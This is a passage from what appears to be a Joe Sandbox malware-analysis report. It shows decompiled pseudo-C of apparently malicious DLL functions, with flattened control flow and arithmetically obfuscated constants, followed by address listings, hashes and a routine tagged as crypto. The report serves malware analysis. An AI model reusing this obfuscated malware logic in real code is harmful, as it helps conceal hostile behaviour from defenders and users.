													_t846 = E02AEED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E02AFE1F8(0x2ae1a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E02AE4A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E02AFFECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E02B03E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E02AFC8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E02B03E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E02AEEF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E02AFE358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E02B010DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}
















































































































                                                                                                          0x02af67f8
                                                                                                          0x02af6800
                                                                                                          0x02af680a
                                                                                                          0x02af6811
                                                                                                          0x02af6818
                                                                                                          0x02af681f
                                                                                                          0x02af6826
                                                                                                          0x02af682d
                                                                                                          0x02af682e
                                                                                                          0x02af6835
                                                                                                          0x02af6836
                                                                                                          0x02af683d
                                                                                                          0x02af6844
                                                                                                          0x02af684b
                                                                                                          0x02af6852
                                                                                                          0x02af6853
                                                                                                          0x02af6854
                                                                                                          0x02af6859
                                                                                                          0x02af6861
                                                                                                          0x02af6864
                                                                                                          0x02af686e
                                                                                                          0x02af6878
                                                                                                          0x02af6880
                                                                                                          0x02af6882
                                                                                                          0x02af688d
                                                                                                          0x02af6892
                                                                                                          0x02af689d
                                                                                                          0x02af68a8
                                                                                                          0x02af68b3
                                                                                                          0x02af68be
                                                                                                          0x02af68c9
                                                                                                          0x02af68d4
                                                                                                          0x02af68df
                                                                                                          0x02af68ea
                                                                                                          0x02af68f5
                                                                                                          0x02af6900
                                                                                                          0x02af690b
                                                                                                          0x02af6916
                                                                                                          0x02af6921
                                                                                                          0x02af692c
                                                                                                          0x02af6937
                                                                                                          0x02af693f
                                                                                                          0x02af6944
                                                                                                          0x02af6951
                                                                                                          0x02af6956
                                                                                                          0x02af6960
                                                                                                          0x02af6965
                                                                                                          0x02af696b
                                                                                                          0x02af6973
                                                                                                          0x02af697e
                                                                                                          0x02af6989
                                                                                                          0x02af6994
                                                                                                          0x02af699c
                                                                                                          0x02af69a8
                                                                                                          0x02af69ab
                                                                                                          0x02af69ad
                                                                                                          0x02af69b1
                                                                                                          0x02af69b6
                                                                                                          0x02af69c0
                                                                                                          0x02af69cc
                                                                                                          0x02af69d1
                                                                                                          0x02af69d7
                                                                                                          0x02af69e4
                                                                                                          0x02af69e5
                                                                                                          0x02af69e9
                                                                                                          0x02af69f1
                                                                                                          0x02af69fc
                                                                                                          0x02af6a07
                                                                                                          0x02af6a12
                                                                                                          0x02af6a1d
                                                                                                          0x02af6a28
                                                                                                          0x02af6a30
                                                                                                          0x02af6a3b
                                                                                                          0x02af6a43
                                                                                                          0x02af6a4b
                                                                                                          0x02af6a53
                                                                                                          0x02af6a5b
                                                                                                          0x02af6a63
                                                                                                          0x02af6a70
                                                                                                          0x02af6a74
                                                                                                          0x02af6a7c
                                                                                                          0x02af6a84
                                                                                                          0x02af6a8c
                                                                                                          0x02af6a99
                                                                                                          0x02af6a9d
                                                                                                          0x02af6aa2
                                                                                                          0x02af6aa7
                                                                                                          0x02af6aaf
                                                                                                          0x02af6abc
                                                                                                          0x02af6ac0
                                                                                                          0x02af6ac5
                                                                                                          0x02af6aca
                                                                                                          0x02af6ad2
                                                                                                          0x02af6ae6
                                                                                                          0x02af6aed
                                                                                                          0x02af6af8
                                                                                                          0x02af6b03
                                                                                                          0x02af6b0b
                                                                                                          0x02af6b13
                                                                                                          0x02af6b18
                                                                                                          0x02af6b20
                                                                                                          0x02af6b28
                                                                                                          0x02af6b30
                                                                                                          0x02af6b38
                                                                                                          0x02af6b42
                                                                                                          0x02af6b46
                                                                                                          0x02af6b4e
                                                                                                          0x02af6b56
                                                                                                          0x02af6b5b
                                                                                                          0x02af6b63
                                                                                                          0x02af6b68
                                                                                                          0x02af6b70
                                                                                                          0x02af6b78
                                                                                                          0x02af6b80
                                                                                                          0x02af6b88
                                                                                                          0x02af6b95
                                                                                                          0x02af6b99
                                                                                                          0x02af6b9e
                                                                                                          0x02af6ba6
                                                                                                          0x02af6bae
                                                                                                          0x02af6bb6
                                                                                                          0x02af6bbe
                                                                                                          0x02af6bcb
                                                                                                          0x02af6bd4
                                                                                                          0x02af6bd8
                                                                                                          0x02af6be0
                                                                                                          0x02af6bed
                                                                                                          0x02af6bf3
                                                                                                          0x02af6bfb
                                                                                                          0x02af6c03
                                                                                                          0x02af6c0b
                                                                                                          0x02af6c13
                                                                                                          0x02af6c1b
                                                                                                          0x02af6c2a
                                                                                                          0x02af6c2d
                                                                                                          0x02af6c31
                                                                                                          0x02af6c39
                                                                                                          0x02af6c41
                                                                                                          0x02af6c49
                                                                                                          0x02af6c4e
                                                                                                          0x02af6c56
                                                                                                          0x02af6c5e
                                                                                                          0x02af6c6b
                                                                                                          0x02af6c6f
                                                                                                          0x02af6c77
                                                                                                          0x02af6c7f
                                                                                                          0x02af6c8b
                                                                                                          0x02af6c90
                                                                                                          0x02af6c96
                                                                                                          0x02af6c9e
                                                                                                          0x02af6ca6
                                                                                                          0x02af6cae
                                                                                                          0x02af6cb6
                                                                                                          0x02af6cbe
                                                                                                          0x02af6cc9
                                                                                                          0x02af6cd1
                                                                                                          0x02af6cdc
                                                                                                          0x02af6ce7
                                                                                                          0x02af6cef
                                                                                                          0x02af6cf7
                                                                                                          0x02af6d03
                                                                                                          0x02af6d08
                                                                                                          0x02af6d0e
                                                                                                          0x02af6d16
                                                                                                          0x02af6d21
                                                                                                          0x02af6d30
                                                                                                          0x02af6d35
                                                                                                          0x02af6d3e
                                                                                                          0x02af6d49
                                                                                                          0x02af6d5c
                                                                                                          0x02af6d5d
                                                                                                          0x02af6d64
                                                                                                          0x02af6d6f
                                                                                                          0x02af6d82
                                                                                                          0x02af6d89
                                                                                                          0x02af6d94
                                                                                                          0x02af6d9f
                                                                                                          0x02af6daa
                                                                                                          0x02af6db5
                                                                                                          0x02af6dc0
                                                                                                          0x02af6dce
                                                                                                          0x02af6dd2
                                                                                                          0x02af6dda
                                                                                                          0x02af6de2
                                                                                                          0x02af6dea
                                                                                                          0x02af6df7
                                                                                                          0x02af6e02
                                                                                                          0x02af6e0a
                                                                                                          0x02af6e15
                                                                                                          0x02af6e29
                                                                                                          0x02af6e2e
                                                                                                          0x02af6e37
                                                                                                          0x02af6e42
                                                                                                          0x02af6e4d
                                                                                                          0x02af6e60
                                                                                                          0x02af6e63
                                                                                                          0x02af6e66
                                                                                                          0x02af6e6d
                                                                                                          0x02af6e78
                                                                                                          0x02af6e80
                                                                                                          0x02af6e88
                                                                                                          0x02af6e90
                                                                                                          0x02af6e98
                                                                                                          0x02af6ea0
                                                                                                          0x02af6eab
                                                                                                          0x02af6eb3
                                                                                                          0x02af6ebe
                                                                                                          0x02af6ec9
                                                                                                          0x02af6ed6
                                                                                                          0x02af6eda
                                                                                                          0x02af6ee2
                                                                                                          0x02af6eea
                                                                                                          0x02af6ef2
                                                                                                          0x02af6efd
                                                                                                          0x02af6f08
                                                                                                          0x02af6f13
                                                                                                          0x02af6f1e
                                                                                                          0x02af6f29
                                                                                                          0x02af6f34
                                                                                                          0x02af6f3f
                                                                                                          0x02af6f47
                                                                                                          0x02af6f52
                                                                                                          0x02af6f5d
                                                                                                          0x02af6f68
                                                                                                          0x02af6f70
                                                                                                          0x02af6f7b
                                                                                                          0x02af6f83
                                                                                                          0x02af6f8d
                                                                                                          0x02af6f99
                                                                                                          0x02af6f9d
                                                                                                          0x02af6fa5
                                                                                                          0x02af6fb0
                                                                                                          0x02af6fb8
                                                                                                          0x02af6fc3
                                                                                                          0x02af6fce
                                                                                                          0x02af6fe1
                                                                                                          0x02af6fe8
                                                                                                          0x02af6ff3
                                                                                                          0x02af7005
                                                                                                          0x02af700a
                                                                                                          0x02af701a
                                                                                                          0x02af701d
                                                                                                          0x02af7024
                                                                                                          0x02af7031
                                                                                                          0x02af7039
                                                                                                          0x02af7041
                                                                                                          0x02af704f
                                                                                                          0x02af7054
                                                                                                          0x02af7058
                                                                                                          0x02af7060
                                                                                                          0x02af706b
                                                                                                          0x02af7076
                                                                                                          0x02af7081
                                                                                                          0x02af708c
                                                                                                          0x02af7097
                                                                                                          0x02af70a2
                                                                                                          0x02af70b1
                                                                                                          0x02af70b2
                                                                                                          0x02af70b6
                                                                                                          0x02af70c3
                                                                                                          0x02af70c7
                                                                                                          0x02af70cf
                                                                                                          0x02af70d7
                                                                                                          0x02af70db
                                                                                                          0x02af70e0
                                                                                                          0x02af70e8
                                                                                                          0x02af70f0
                                                                                                          0x02af70fb
                                                                                                          0x02af7103
                                                                                                          0x02af710e
                                                                                                          0x02af7119
                                                                                                          0x02af7124
                                                                                                          0x02af712f
                                                                                                          0x02af713a
                                                                                                          0x02af7145
                                                                                                          0x02af7150
                                                                                                          0x02af715b
                                                                                                          0x02af7166
                                                                                                          0x02af7171
                                                                                                          0x02af7179
                                                                                                          0x02af7186
                                                                                                          0x02af718a
                                                                                                          0x02af718f
                                                                                                          0x02af7197
                                                                                                          0x02af719f
                                                                                                          0x02af71a7
                                                                                                          0x02af71af
                                                                                                          0x02af71b7
                                                                                                          0x02af71bf
                                                                                                          0x02af71ca
                                                                                                          0x02af71d5
                                                                                                          0x02af71e0
                                                                                                          0x02af71eb
                                                                                                          0x02af71f3
                                                                                                          0x02af71fe
                                                                                                          0x02af7209
                                                                                                          0x02af721c
                                                                                                          0x02af7223
                                                                                                          0x02af722e
                                                                                                          0x02af723c
                                                                                                          0x02af7240
                                                                                                          0x02af7245
                                                                                                          0x02af724d
                                                                                                          0x02af7255
                                                                                                          0x02af725d
                                                                                                          0x02af7262
                                                                                                          0x02af726f
                                                                                                          0x02af7273
                                                                                                          0x02af727b
                                                                                                          0x02af7285
                                                                                                          0x02af7291
                                                                                                          0x02af7292
                                                                                                          0x02af7296
                                                                                                          0x02af729e
                                                                                                          0x02af72a6
                                                                                                          0x02af72b1
                                                                                                          0x02af72bc
                                                                                                          0x02af72c7
                                                                                                          0x02af72d2
                                                                                                          0x02af72da
                                                                                                          0x02af72e5
                                                                                                          0x02af72f0
                                                                                                          0x02af72f8
                                                                                                          0x02af7300
                                                                                                          0x02af7308
                                                                                                          0x02af730d
                                                                                                          0x02af7315
                                                                                                          0x02af7329
                                                                                                          0x02af7330
                                                                                                          0x02af733b
                                                                                                          0x02af7346
                                                                                                          0x02af734e
                                                                                                          0x02af735b
                                                                                                          0x02af735f
                                                                                                          0x02af7367
                                                                                                          0x02af736f
                                                                                                          0x02af737a
                                                                                                          0x02af7382
                                                                                                          0x02af738a
                                                                                                          0x02af7395
                                                                                                          0x02af73a0
                                                                                                          0x02af73ab
                                                                                                          0x02af73b6
                                                                                                          0x02af73be
                                                                                                          0x02af73c6
                                                                                                          0x02af73ce
                                                                                                          0x02af73d6
                                                                                                          0x02af73de
                                                                                                          0x02af73f1
                                                                                                          0x02af73f8
                                                                                                          0x02af7400
                                                                                                          0x02af740b
                                                                                                          0x02af741e
                                                                                                          0x02af7425
                                                                                                          0x02af742d
                                                                                                          0x02af7438
                                                                                                          0x02af7443
                                                                                                          0x02af744e
                                                                                                          0x02af7456
                                                                                                          0x02af7461
                                                                                                          0x02af7469
                                                                                                          0x02af7476
                                                                                                          0x02af747a
                                                                                                          0x02af7482
                                                                                                          0x02af748a
                                                                                                          0x02af7495
                                                                                                          0x02af74a0
                                                                                                          0x02af74ab
                                                                                                          0x02af74b3
                                                                                                          0x02af74b8
                                                                                                          0x02af74bd
                                                                                                          0x02af74c5
                                                                                                          0x02af74cd
                                                                                                          0x02af74d2
                                                                                                          0x02af74da
                                                                                                          0x02af74e5
                                                                                                          0x02af74f0
                                                                                                          0x02af74f8
                                                                                                          0x02af7503
                                                                                                          0x02af750a
                                                                                                          0x02af7511
                                                                                                          0x02af7511
                                                                                                          0x02af7511
                                                                                                          0x02af7516
                                                                                                          0x02af7516
                                                                                                          0x02af751a
                                                                                                          0x02af751a
                                                                                                          0x02af751a
                                                                                                          0x02af7520
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af7526
                                                                                                          0x02af76ab
                                                                                                          0x00000000
                                                                                                          0x02af752c
                                                                                                          0x02af7532
                                                                                                          0x02af7699
                                                                                                          0x02af769b
                                                                                                          0x02af76a2
                                                                                                          0x02af76a3
                                                                                                          0x00000000
                                                                                                          0x02af7538
                                                                                                          0x02af753e
                                                                                                          0x02af7651
                                                                                                          0x02af765d
                                                                                                          0x02af7672
                                                                                                          0x02af7679
                                                                                                          0x02af767e
                                                                                                          0x02af7683
                                                                                                          0x02af7915
                                                                                                          0x02af7915
                                                                                                          0x02af791c
                                                                                                          0x00000000
                                                                                                          0x02af7544
                                                                                                          0x02af754a
                                                                                                          0x02af761e
                                                                                                          0x02af7623
                                                                                                          0x00000000
                                                                                                          0x02af7550
                                                                                                          0x02af7556
                                                                                                          0x02af75f0
                                                                                                          0x02af75f5
                                                                                                          0x02af75fa
                                                                                                          0x02af75fc
                                                                                                          0x02af75fc
                                                                                                          0x00000000
                                                                                                          0x02af755c
                                                                                                          0x02af7563
                                                                                                          0x02af7921
                                                                                                          0x02af7921
                                                                                                          0x02af7927
                                                                                                          0x02af7516
                                                                                                          0x00000000
                                                                                                          0x02af7516
                                                                                                          0x02af7569
                                                                                                          0x02af75b6
                                                                                                          0x02af75bb
                                                                                                          0x02af75c2
                                                                                                          0x02af75c7
                                                                                                          0x02af75d0
                                                                                                          0x02af75d5
                                                                                                          0x00000000
                                                                                                          0x02af75d5
                                                                                                          0x02af7563
                                                                                                          0x02af7556
                                                                                                          0x02af754a
                                                                                                          0x02af753e
                                                                                                          0x02af7532
                                                                                                          0x02af7945
                                                                                                          0x02af7951
                                                                                                          0x02af7951
                                                                                                          0x02af76b5
                                                                                                          0x02af76b7
                                                                                                          0x02af7772
                                                                                                          0x02af7775
                                                                                                          0x02af77a6
                                                                                                          0x02af7777
                                                                                                          0x02af7777
                                                                                                          0x02af7783
                                                                                                          0x02af778a
                                                                                                          0x02af7795
                                                                                                          0x02af779a
                                                                                                          0x02af779d
                                                                                                          0x02af779d
                                                                                                          0x02af77e6
                                                                                                          0x02af77ed
                                                                                                          0x02af77ed
                                                                                                          0x02af77ef
                                                                                                          0x02af77f1
                                                                                                          0x02af77f1
                                                                                                          0x02af7841
                                                                                                          0x02af7858
                                                                                                          0x02af785d
                                                                                                          0x02af7860
                                                                                                          0x02af7862
                                                                                                          0x02af7910
                                                                                                          0x00000000
                                                                                                          0x02af7868
                                                                                                          0x02af788b
                                                                                                          0x02af7892
                                                                                                          0x02af7897
                                                                                                          0x02af789a
                                                                                                          0x02af789c
                                                                                                          0x02af78c6
                                                                                                          0x02af78d6
                                                                                                          0x02af78d6
                                                                                                          0x02af78d6
                                                                                                          0x02af78fe
                                                                                                          0x02af7903
                                                                                                          0x02af7903
                                                                                                          0x02af7906
                                                                                                          0x00000000
                                                                                                          0x02af7906
                                                                                                          0x02af76bd
                                                                                                          0x02af76bd
                                                                                                          0x02af76c3
                                                                                                          0x02af7763
                                                                                                          0x02af776a
                                                                                                          0x00000000
                                                                                                          0x02af76c9
                                                                                                          0x02af76c9
                                                                                                          0x02af76cf
                                                                                                          0x02af793e
                                                                                                          0x02af76d5
                                                                                                          0x02af76d5
                                                                                                          0x02af76db
                                                                                                          0x02af76f3
                                                                                                          0x02af76f5
                                                                                                          0x02af76f7
                                                                                                          0x02af7705
                                                                                                          0x02af7705
                                                                                                          0x02af76f9
                                                                                                          0x02af7700
                                                                                                          0x02af7700
                                                                                                          0x02af7707
                                                                                                          0x02af772c
                                                                                                          0x02af7731
                                                                                                          0x02af7736
                                                                                                          0x02af773e
                                                                                                          0x00000000
                                                                                                          0x02af76dd
                                                                                                          0x02af76dd
                                                                                                          0x02af76e3
                                                                                                          0x00000000
                                                                                                          0x02af76e9
                                                                                                          0x02af76e9
                                                                                                          0x00000000
                                                                                                          0x02af76e9
                                                                                                          0x02af76e3
                                                                                                          0x02af76db
                                                                                                          0x02af76cf
                                                                                                          0x02af76c3
                                                                                                          0x00000000
                                                                                                          0x02af76b7
                                                                                                          0x02af7516

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
                                                                                                          • API String ID: 0-4090907037
                                                                                                          • Opcode ID: ac7af1620a9c81a84b0f4fda46be90838e4c350897fe0d3d28a93a44de1415ae
                                                                                                          • Instruction ID: 8e5d9ed83deb4b476ab665e3e402ca66db1b2d2164e056acb1e22f7d05e69f22
                                                                                                          • Opcode Fuzzy Hash: ac7af1620a9c81a84b0f4fda46be90838e4c350897fe0d3d28a93a44de1415ae
                                                                                                          • Instruction Fuzzy Hash: 2792F071509381CFD3B9CF65C98AA8BFBE1BBC4304F10891DE5D996260D7B58949CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFA474, Relevance: 15.4, Strings: 12, Instructions: 357COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AFA474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E02AE1A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E02B02D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x2ae192c,  &_v520,  &_v1040, E02AFE1F8(0x2ae192c, _v2696, __eflags));
						E02AFFECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E02AF85FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
